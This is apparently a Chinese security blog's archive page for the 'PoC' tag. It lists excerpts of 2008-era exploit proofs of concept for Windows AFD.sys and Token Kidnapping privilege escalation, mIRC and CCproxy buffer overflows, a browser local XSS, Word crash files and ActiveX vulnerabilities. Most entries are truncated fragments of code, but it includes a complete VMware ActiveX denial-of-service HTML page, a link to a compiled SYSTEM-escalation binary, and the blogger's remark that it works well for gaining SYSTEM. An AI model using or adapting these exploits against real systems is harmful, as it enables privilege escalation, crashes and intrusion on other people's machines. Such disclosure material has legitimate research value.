标签 ‘PoC’ 下的日志

MS08-066 AFD.sys Local Privilege Escalation Exploit (POC)

文章作者:Eros412
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

MS Bulletin : http://www.microsoft.com/technet/security/Bulletin/MS08-066.mspx

**********计算IoControlCode过程**********
阅读全文 »

Tags: , , , ,

MS Windows InternalOpenColorProfile Heap Overflow PoC (MS08-046)

EMR_SETICMPROFILEA Heap Overflow DOS

By Ac!dDrop

related to MS08-046

Tested on windows Xp professional Sp2
mscms.dll 5.1.2600.2709
gdi32.dll 5.1.2600.2818
阅读全文 »

Tags: ,

MS Windows 2003 Token Kidnapping Local Exploit PoC

鬼仔:提权很好用,直接system。文章末尾贴个TR那里的测试图。
编译好的:http://www.blogjava.net/Files/baicker/Churrasco.rar (via 009

From:http://nomoreroot.blogspot.com/2008/10/windows-2003-poc-exploit-for-token.html

It has been a long time since Token Kidnapping presentation (http://www.argeniss.com/research/TokenKidnapping.pdf)
was published so I decided to release a PoC exploit for Win2k3 that alows to execute code under SYSTEM account.
阅读全文 »

Tags: , , , ,

mIRC 6.34 Remote Buffer Overflow PoC

########################################################
# Mirc 6.34 Remote Buffer Overflow
#
# This poc allow you to own the 2 first EDI & EDX bytes.
#
# To become remote, add a simple document.location.href=irc://server.com/… in some html page
#
use IO::Socket;
阅读全文 »

Tags: ,

CCproxy 6.5 Connect BufferOverflow POC

作者:Friddy

#Author:Friddy
#QQ:568623
#Email:[email protected]
import sys
import struct
import socket
from time import sleep
prinf “CCproxy 6.5 Connect BufferOverflow POC\nResult:Crash\n”
buf=(“CONNECT “+”A”*1100+”:443 HTTP/1.0\n”
“User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; .NET CLR 2.0.50727)\n”
“Host: www.friddy.cn\n”
“Content-Length: 0\n”
“Proxy-Connection: Keep-Alive\n”
“Pragma: no-cache\x0d\x0a\x0d\x0a”)
阅读全文 »

Tags: ,

世界之窗等浏览器本地xss跨域漏洞POC

漏洞说明:http://www.80sec.com/360-sec-browser-localzone-xss.html
文档来源:http://www.80sec.com/release/The-world-browser-locale-zone-xss-POC.txt

漏洞分析:世界之窗浏览器在起始页面是以res://E:\PROGRA~1\THEWOR~1.0\languages\chs.dll /TWHOME.HTM的形式来处理的,而由于缺乏对res协议安全的必要控制,导致页面的权限很高,而该页面中存在的一个xss问题将导致本地跨域漏 洞,简单分析如下:

<script language="JavaScript">
var nOldCount = 0;
for( i = 0; i < g_nCountOld; i ++ )
{
str_url = g_arr_argUrlOld[i];
str_name = g_arr_argNameOld[i];

阅读全文 »

Tags: , ,

Word 0day POC发布了

来源:Sowhat的blog

Microsoft Word Bulleted List Handling Remote Memory Corruption Vulnerability

http://www.securityfocus.com/data/vulnerabilities/exploits/crash-word-1.doc
http://www.securityfocus.com/data/vulnerabilities/exploits/crash-word-2.doc
http://www.securityfocus.com/data/vulnerabilities/exploits/crash-word-3.doc
http://www.securityfocus.com/data/vulnerabilities/exploits/crash-word-4.doc

或者统一打包 http://packetstormsecurity.org/0806-exploits/msword-crash.tgz

Tags: ,

VMware Server Console ActiveX DOS POC

<html>
<title>VMware Server Console ActiveX DOS POC</title>
<!--
Author:Shennan Wang
blog:http://hi.baidu.com/nansec
stuff:http://www.d4rkn3t.cn
thanks:
Robinh00d,ayarei,void
-->
<head>
<script language="JavaScript">
    function test() {
var bufA = "2";
var bufB = "0";
var bufC = "0";
var bufD = "8";
for (i = 0; i < 2008; i++) { 
bufA += bufA;}
for (i = 0; i < 2008; i++){
bufB += bufB;}
for (i = 0; i < 2008; i++){
bufC += bufC;}
for (i = 0; i < 2008; i++){
bufD += bufD;}  
nansec.DoModalDirect(bufA,bufB,bufC,bufD);}
</script>
</head>
 <body onload="JavaScript: return test();">
<object classid="clsid:D2C53A29-B43A-4367-B808-52CE785BBF36" id="nansec">
</object>
 </body>
</html>

# milw0rm.com [2008-05-28]
Tags: , ,